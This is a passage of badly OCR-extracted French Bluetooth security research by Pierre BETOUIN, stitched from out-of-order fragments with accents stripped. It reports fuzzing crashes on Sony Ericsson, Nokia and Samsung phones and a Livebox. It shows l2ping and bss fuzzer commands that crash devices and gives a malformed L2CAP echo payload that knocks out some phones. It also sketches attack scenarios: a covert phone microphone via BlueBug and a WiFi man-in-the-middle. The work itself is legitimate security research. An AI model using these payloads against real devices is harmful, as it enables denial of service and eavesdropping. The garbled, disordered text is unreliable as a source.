27. ooth sou vent quip s de technologies propri taires sur lesquelles le reverse engineering n est pas forc ment simple mettre en oeuvre les techniques de fuzzing s appliquent merveille dans ce contexte Les p riph riques test s sont pr sent s ci dessous Si certains plantent syst matiquement lors de la m me phase du fuzzing d autres en revanche pr sentent des comportements difficilement reproductibles files d attentes satur es suites de bugs mineurs etc Il est surprenant de constater que les p riph riques qui supportent l int gralit des tests effectu s par le fuzzer sont relativement peu nombreux Ce n est cependant pas un gage de s curit le Sony Ericsson T68i a pass ces tests avec plus de succ s que certains t l phones plus r cents 5 3 1 T l phones mobiles Sony Ericsson T68i Bravo aux d veloppeurs de la couche L2CAP moins ceux qui ont repris son travail Les tests de fuzzing n ont pas permis de planter le T68i directement contrairement beau coup d autres En revanche suite certains tests men s des anomalies sont apparues no tamment l impossibilit d teindre le p riph rique normalement la batterie a parfois d tre enlev e Ces bugs sont difficilement reproductibles car il est impossible de conna tre le paquet ou la suite de paquets l origine des dyfonctionnements In s curit du Bluetooth Pierre BETOUIN 5 3 P riph riques audit
28. pant la m moire des quipements soit en exploitant une faille soit en d veloppant un outil appro pri 6 Sc narios 6 1 T l phone micro Le sc nario suivant malheureusement tr s r aliste consiste exploiter une vuln rabilit de type BlueBug dans le but de transformer un cellulaire en micro de poche de fa on enti rement transparente pour la victime Les cons quences d une telle exploitation pourraient videmment se r v ler tr s lourdes L attaquant cherchera dans un premier temps r colter un maximum d informations concer nant le t l phone cible La premi re information cruciale est le mod le du t l phone disponible bien souvent avec le nom Bluetooth du p riph rique ou par une prise d empreinte fingerprinting passive du terminal distant cf Tri06a outil de prise d empreinte Bluetooth En cas de succ s sur un t l phone vuln rable l attaque peut se mener directement et sans aucune alerte car les ports RFCOMM ouverts sont connus sur de nombreux mod les En cas d echec de l identification du terminal une recherche exhaustive des services dis ponibles via une recherche SDP sera effectu e suivie d un scan des ports RFCOMM cf MUL06 scanner L2CAP et RFCOMM L attaque perdra en furtivit car une alerte sat fichera sur le terminal pour les ports RFCOMM n cessitant une authentification Ce n est cependant pas critique pour l attaquant car rares sont les t l ph
29. s Les stations s associent au point d acc s 802 11 correspondant leur configuration Si 2 points d acc s similaires sont d tect s elles choisissent le point d acc s le plus puissant donc souvent le plus proche g ographiquement Cette propri t est pratique pour des raisons de roaming par exemple L attaque pr sent e consiste d sactiver le signal 802 11 d un point d acc s afin de prendre le relais et de se glisser au milieu de la communication il s agit d un cas typique de Man in The Middle Une attaque quivalente peut tre men e avec une antenne de forte puissance Tous les l ments de la configuration du point d acc s doivent tre d abord recens s ESSID BSSID Canal 802 11 Eventuelle clef WEP l attaquant aura pris soin de casser la clef avant de d sactiver le point d acc s Il utilisera par exemple aircrack La d sactivation du point d acc s s effectuera avec une attaque de DoS Bluetooth En effet certains quipements test s ont totalement crash et non juste leurs piles Bluetooth apr s pas sage du fuzzer BSS In s curit du Bluetooth Pierre BETOUIN 6 2 D tournement de trafic WiFi 19 Une fois PAP l gitime neutralis PAP semblable en tous points sera activ par l at taquant tous les clients qui taient associ s sur l ancien quipement vont alors migrer vers le nouveau In s curit du Bluetooth Pierre BETOUIN Con
30. s et r sultats 13 Nokia N70 S60 suite des tests effectu s sur plusieurs N70 un mod le fran ais Orange ainsi qu un mod le chinois leurs comportements se sont av r s diff rents Le mod le fran ais dont DOS Symbian a semble t il t patch par Orange est sensible aux paquets de grandes tailles la pile Bluetooth du t l phone crashe le rendant ainsi inaccessible l2ping c 3 00 15 A0 XX XX XX Ping 00 15 A0 XX XX XX from 00 20 E0 75 83 DA data size 44 O bytes from 00 15 A0 XX XX XX id O time 64 18ms O bytes from 00 15 A0 XX XX XX id 1 time 43 94ms O bytes from 00 15 A0 XX XX XX id 2 time 37 25ms 3 sent 3 received 0 loss bss m 12 s 1000 00 15 A0 XX XX XX snip l2ping c 1 00 15 AO0 XX XX XX Ping 00 15 A0 XX XX XX from 00 20 E0 75 83 DA data size 248 no response from 00 80 37 ZZ ZZ ZZ id 0 1 sent O received 100 loss F1G 5 Crash de la pile Bluetooth du Nokia N70 En revanche le mod le chinois ne s est pas montr faillible cette derni re attaque De la m me fa on que le T68i le Nokia N70 a montr un comportement anormal suite un fuzzing BSS al atoire mode 12 de paquets de tailles inf rieures 200 octets En rallumant le t l phone plusieurs messages envoy s dans la p riode entre les tests et le red marrage du t l phone ont t re us Son
31. semble des services du point d acc s le signal 802 11 de l quipement disparait alors le rendant ainsi inaccessible aux clients associ s Il semblerait que les piles de ces quipements aient t modifi es par le constructeur Comme pour les autres quipements test s il n est pas possible den conna tre beaucoup plus au sujet des plantages moins bien s r de debugger le p riph rique pendant le crash ce qui implique plus de moyens mat riels Ces boites sont souvent rendues les plus opaques possibles par les constructeurs d o le fr quent surnom de boites noires hcitool scan Scanning 00 03 C9 YY YY YY Wanadoo_YYYY l2ping c 3 00 03 C9 YY YY YY Ping 00 03 C9 YY YY YY from 00 20 E0 75 83 DA data size 44 O bytes from 00 03 C9 YY YY YY id O time 202 69ms O bytes from 00 03 C9 YY YY YY id 1 time 119 00ms O bytes from 00 03 C9 YY YY YY id 2 time 67 12ms bss m 12 00 03 C9 YY YY YY snip l2ping c 3 00 03 C9 YY YY YY Ping 00 03 C9 YY YY YY from 00 20 E0 75 83 DA data size 44 no response from 00 03 C9 YY YY YY id 0 no response from 00 03 C9 YY YY YY id 1 no response from 00 03 C9 YY YY YY id 2 hcitool scan Scanning Il semblerait qu aucun paquet sp cifique ne soit l origine du crash L hypoth se d une suite de paquets malform s est plus probable en effet les derniers paquets envoy s la Livebox avant le crash n ont pas permis de la crasher de nouv
32. tion de p riph riques Les p riph riques en mode non d tectable peuvent tre recens s par une attaque de bruteforce sur l adresse Bluetooth ceux ci ne r pondent pas aux diffusions de type inquiry broadcasts mais peuvent cependant tre identifi s directement Si l attaque semble irr aliste sur une plage allant de 00 00 00 00 00 00 FF FF FF FF FF FF avec un seul dongle environ 11 heures elle est cependant imaginable sur de plus petites plages plages de constructeurs par exemple ce qui r duit le scan au plus 3 octets ou en parall lisant le scan l aide de plusieurs dongles Bluetooth 90 minutes environ avec 8 dongles L outil redfang permet d effectuer ces recherches de p riph riques btscanner cf HUR06 permet de lister les p riph riques disponibles et fournit galement diverses informations les concernant Address Clk off Class Name 2006 01 16 18 52 03 00 80 37 mm Oxbelc 0x522204 T68 2006 01 16 18 51 48 00 03 09 0x784a 0x520310 lWanadoo_6ab8 2006 01 16 CRETE 0x2767 0x50020c blue Found device Found device Found device Found device FIG 3 D tection de p riph riques avec btscanner 4 2 Processus de pairing Le pairing processus permettant d autoriser ou non un p riph rique distant se connecter sur un service local peut prendre plusieurs formes Demande explicite sur le terminal distant souvent sous la forme d un message d aver tissem
33. y Ericsson K600i V600i K750i et W800i les t l phones ont pr sent des com portements anormaux avec des paquets L2CAP al atoires de petites tailles l affichage de l cran s teint progressivement puis les t l phones affichent des crans blancs Ils reviennent ensuite dans un fonctionnement normal quelques secondes plus tard Un exploit est dispo In s curit du Bluetooth Pierre BETOUIN 5 3 P riph riques audit s et r sultats 14 nible sur BET06c Le contenu du paquet L2CAP responsable de ce comportement anormal est tr s simple 08 01 01 00 Soit les champs cmd gt code L2CAP_ECHO_REQ cmd gt ident 1 cmd gt len 1 Avec une taille r elle envoy e plus grande 4 octets ici que celle sp cifi e dans le champ length 1 octet ici Sur certains mod les a priori de firmares diff rents le clavier devient inutilisable apr s cette attaque il faut alors enlever la batterie pour teindre le t l phone Le bug se produit quand la taille sp cifi e dans l en t te L2CAP est gale la taille r elle du paquet moins 3 taille de l en t te L2CAP Il y a de grandes chances pour qu il s agisse d une division par z ro Samsung E730 le t l phone a pu tre crash quivalent du bouton on off avec des paquets de petites tailles Un crash de la pile Bluetooth a galement pu tre provoqu En raison d une temporisation du t l phone la valeur MAXCRASH dans le fichier
Download Pdf Manuals
Related Search